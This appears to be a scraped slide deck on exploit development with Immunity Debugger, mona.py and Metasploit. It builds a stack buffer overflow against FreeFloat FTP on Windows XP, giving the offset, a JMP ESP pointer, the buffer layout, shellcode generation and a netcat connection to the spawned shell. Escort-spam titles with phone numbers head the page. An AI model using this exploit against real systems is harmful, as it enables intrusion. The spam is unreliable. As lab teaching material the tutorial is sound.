CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Dive into exploit development with Immunity Debugger, Mona.py and Metasploit

  • 1. Dive into exploit development Mohsen Ahmadi
  • 2. Disclaimer If you’re someone that wants to build exploits to partake in illegal or immoral activity, please go elsewhere
  • 3. Introduction to Exploit Development
    • Explore some basic ideas behind exploits
    • How we can execute our shellcodes
    • Each part contains a technique for successfully exploiting a program in the wild
    • We’ll cover everything from SRP to ROP
  • 4. Preparing our laboratory in a Virtual Machine
    • Immunity Debugger
    • Mona.py
    • Pvefindaddr.py
    • Metasploit Framework
    • Virtualization software
  • 5. Immunity Debugger (cont)
    • A powerful new way to write exploits, analyze malware, and reverse engineer binary files
    • Immunity Debugger is similar to OllyDbg but it has Python support
    • Cuts exploit development time by 50%
    • Connectivity to fuzzers and exploit development tools
    • http://debugger.immunityinc.com/ID_register.py
  • 6. Features
    • Remote command bar
    • Python scripting
    • Built-in graphing
    • Immunity Debugger is light
    • Immunity Debugger exposes the information you need
  • 11. Immunity Debugger exposes the information you need
  • 12. Mona.py (cont)
    • Mona.py is a plug-in for Immunity Debugger developed by the Corelan Team
    • Mona also requires a small amount of configuration before you can start using it
    • Human error rates are high when dealing with binary and hex
    • Mona can scan data for patterns much faster and more accurately than we can
    • Mona can even build ROP structures
  • 13. Set of commands supported by Mona
  • 14. Mona Lisa
    • We’ll talk about how to configure and work with Mona in later slides!
  • 15. Pvefindaddr.py
    • Well, in short terms, !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need when building an exploit
  • 16. Metasploit Framework
    • Generating our desired shellcodes
    • Escaping bad characters with msfencode
    • Receiving any connection back to our computer
    • Try to use Kali Linux, which fulfills your needs
  • 18. x86 CPU registers (cont)
    • EAX - Main register used in arithmetic calculations. Also known as the accumulator, as it holds the results of arithmetic operations and function return values.
    • EBX - The Base Register. Pointer to data in the DS segment. Used to store the base address of the program.
    • ECX - The Counter register is often used to hold a value representing the number of times a process is to be repeated. Used for loop and string operations.
    • EDX - A general purpose register. Also used for I/O operations. Helps extend EAX to 64 bits.
    • ESI - Source Index register. Pointer to data in the segment pointed to by the DS register. Used as an offset address in string and array operations. It holds the address from where to read data.
  • 19. x86 CPU registers
    • EBP - Base Pointer. Pointer to data on the stack (in the SS segment). It points to the bottom of the current stack frame. It is used to reference local variables.
    • ESP - Stack Pointer (in the SS segment). It points to the top of the current stack frame. It is used to reference local variables.
    • EIP - Instruction Pointer (holds the address of the next instruction to be executed)
    • EDI - Destination Index register. Pointer to data (or destination) in the segment pointed to by the ES register. Used as an offset address in string and array operations. It holds the implied write address of all string operations.
  • 20. BOF
    • Buffer overflow: a memory location receives more data than it was meant to
    • Stack overflow: usually a buffer overflow that writes over the stack segment beyond the end of the stack
  • 21. What to look for?
    • Our buffer needs to overwrite EIP
    • One of the CPU registers needs to contain our buffer
  • 22. How does it work?
    1) We send an overly long string to our program
    2) This string overwrites EIP and part of it is stored in a CPU register
    3) We find a pointer to an instruction that jumps to the register that contains our buffer
    4) We put that pointer in the correct place in our buffer so it overwrites EIP
    5) When the program reaches our pointer it executes the instruction and jumps to the register that contains our buffer
    • Finally we place our shellcode in the part of the buffer that is stored in the CPU register!
  • 23. First scenario
    • Exploit development: Kali Linux
    • Debugging machine: Windows XP Pro SP3
    • Vulnerable software: FreeFloat FTP
    • Write a simple BOF exploit from scratch
  • 24. Direct EIP overwrite
    • Exploit development: Kali Linux
    • Debugging machine: Windows XP Pro SP3
    • Vulnerable software: FreeFloat FTP
    • Write a simple BOF exploit from scratch
    • For the first tutorial we’ll just rely on the bad characters “\x00\x0A\x0D”
  • 25. Getting started with Immunity Debugger
    • Starting the debugger
    • Opening and attaching to the debugging target application
    • CPU window
    • Registers window
    • I’ll explain each part separately
  • 26. Starting the debugger
    • Before starting, you need to ensure that you are using an account that has the appropriate privileges, generally local Administrator equivalent
    • “Run as administrator”
  • 27. Opening and attaching to the debugging target application
    • By opening the target executable from disk using the File->Open menu option
    • By attaching to an already running program using the File->Attach menu option
  • 29. Attach to the target
  • 30. CPU window
    • The actual instructions of the program we are about to run
    • I will be referring to this as the CPU instruction or disassembler pane
    • Memory address
    • Opcode
    • x86 MASM syntax
    • Alt+C
  • 31. Registers / flags window
    • These registers are small storage areas within the CPU itself, and they are used to facilitate various operations that are performed within the x86 assembly language
  • 34. Open program
    • First open FreeFloat FTP Server
    • When the service is up, check the state of connections on your target machine
  • 36. Replicate the crash (cont)
    • Create a POC skeleton exploit to crash the FTP server
    • FTP servers come with a built-in anonymous user account
    • MKD ~ make directory
    • FTP port is 21
  • 37. POC!
    • Send your POC payload to the server
    • Check whether EIP is overwritten with “\x41”
    • Which registers contain part of our buffer?
    • Try to find out which register contains the larger chunk of our data
    • “\x41” ~ “A”
  • 38. Registers: EIP overwritten; EDI and ESP contain part of our buffer
  • 39. Metasploit pattern
    • We now need to determine the correct offset in order to get code execution
    • pattern_create.rb
    • The script will generate a string composed of unique patterns that we can use to replace our sequence of 'A's
    • Pay attention that you keep the original buffer length, since a varying buffer length may change the program crash
  • 40. Again replicate your crash (cont)
    • Send your payload to the FTP service and check the EIP value, which is now overwritten by the Metasploit pattern
  • 41. Check EIP!
    • Find the offset at which EIP is overwritten by our pattern
    • !mona comes into play
  • 42. Configure !mona
    • Download Mona and copy it to the PyCommands directory of Immunity Debugger
    • Use the following command to configure mona
    • %p based on process name
    • %i based on process id
  • 43. Find cyclic pattern with !mona
    • !mona findmsp
    • From the analysis we can see that EIP is overwritten by the 4 bytes which directly follow the initial 247 bytes of our buffer
  • 45. Check again
    • Now our buffer should look like this:
    • Buffer = “A”*247 + ”B”*4 + ”C”*749
    • “B” ~ “\x42”
  • 46. Replace “B”s with a pointer to ESP
    • We can replace those B's with a pointer that redirects execution flow to ESP
    • Keep in mind that our pointer can't contain any bad characters
    • Do you remember the bad characters? “\x00\x0A\x0D”
  • 47. JMP ESP
    • To find a valid pointer which redirects us to ESP we can use mona with the following command
    • !mona jmp -r esp
  • 48. Endian order of the x86 processor
    • Register value: CEFAEDFE
    • Big endian (others), from low to high memory addresses: CE FA ED FE
    • Little endian (Intel), from low to high memory addresses: FE ED FA CE
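The offset-finding steps (slides 39 to 43) and the little-endian pointer encoding with bad-character check (slides 46 to 48), as an added Python example that is not part of the deck, of Metasploit or of mona. It assumes the Metasploit-style cyclic pattern algorithm and the 1000-byte buffer length and bad characters “\x00\x0A\x0D” from the slides; the EIP value 0x69413269 is computed from the generated pattern, not a value taken from the deck's debugger session.

```python
"""Added crash-triage helpers, not from the slides: reproduce what
pattern_create.rb and !mona findmsp do, then encode a pointer the way
the little-endian x86 expects it while rejecting bad characters."""
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style cyclic pattern (Aa0Aa1...): every 4-byte window
    is unique, so any 4 bytes seen in EIP map back to one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def eip_offset(pattern, eip_value):
    """Offset in the pattern of the 4 bytes that ended up in EIP.

    eip_value is the number the debugger displays. x86 is little endian,
    so the bytes that sat in memory are the reverse of that display;
    struct.pack('<I') yields them in memory order. Returns -1 if absent.
    """
    return pattern.find(struct.pack("<I", eip_value))


def pack_pointer(address, bad_chars=b"\x00\x0a\x0d"):
    """Little-endian encoding of a 32-bit pointer; refuses any pointer
    whose encoded bytes contain one of the bad characters."""
    packed = struct.pack("<I", address)
    if any(b in bad_chars for b in packed):
        raise ValueError("pointer 0x%08x contains a bad character" % address)
    return packed


if __name__ == "__main__":
    pat = cyclic_pattern(1000)          # same length as the all-'A' buffer
    print(eip_offset(pat, 0x69413269))  # 247, the offset findmsp reports
    print(pack_pointer(0x77c35459))     # b'YT\xc3w' == "\x59\x54\xC3\x77"
```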
  • 49. Msvcrt.dll (MS12-013)
    • Starting from Visual Studio 2003, any program that is dynamically linked to the C Run-Time library will use msvcrXX.dll instead of msvcrt.dll
    • If your program is statically linked with this Visual C run-time library, your program is safe
    • %windir%\system32
  • 50. Our pointer to JMP ESP
    • 0x77c35459 : push esp # ret [msvcrt.dll]
    • C:\WINDOWS\system32\msvcrt.dll
    • Put a breakpoint on our pointer (F2)
  • 51. Put our shellcode into the buffer
    • Inserting our payload in the part of the buffer that is now made up of C's
    • We would like to have the buffer length modified dynamically
    • Insert some NOPs (No Operation Performed = \x90) before our payload as padding
    • buffer = "A"*247 + "\x59\x54\xC3\x77" + "\x90"*20 + shellcode + "C"*(749-(len(shellcode)+20))
  • 52. Generate our shellcode with msfpayload (cont)
    • msfpayload -l | grep windows
    • Metasploit has a command-line shellcode generation function called msfpayload
    • To use msfpayload, you need to know the options associated with each payload
    • msfpayload -O
  • 54. Msfencode | bad character escaping
    • Encode your exploit to prevent broken shellcode
  • 55. Check netstat before & after the POC!
    • If our payload works without raising any error, it will spawn a shell for us on port 3320 :D
    • Let’s check it with NetCat
  • 56. Game over!
    • nc -nvv 192.168.149.153 3320
    • v: verbose mode
    • n: use IP only, don’t resolve DNS
    • Hopefully you now understand the basics of a stack-based buffer overflow
  • 57. OS DLL or application
    • If you choose an OS DLL, your exploit isn't portable, because these DLLs are not the same in the various versions of Windows
    • These DLLs are not randomized on XP but they are on Windows 7
    • If your application moves between operating system versions, you're still going to be referencing a JMP ESP within the application itself, and not be OS dependent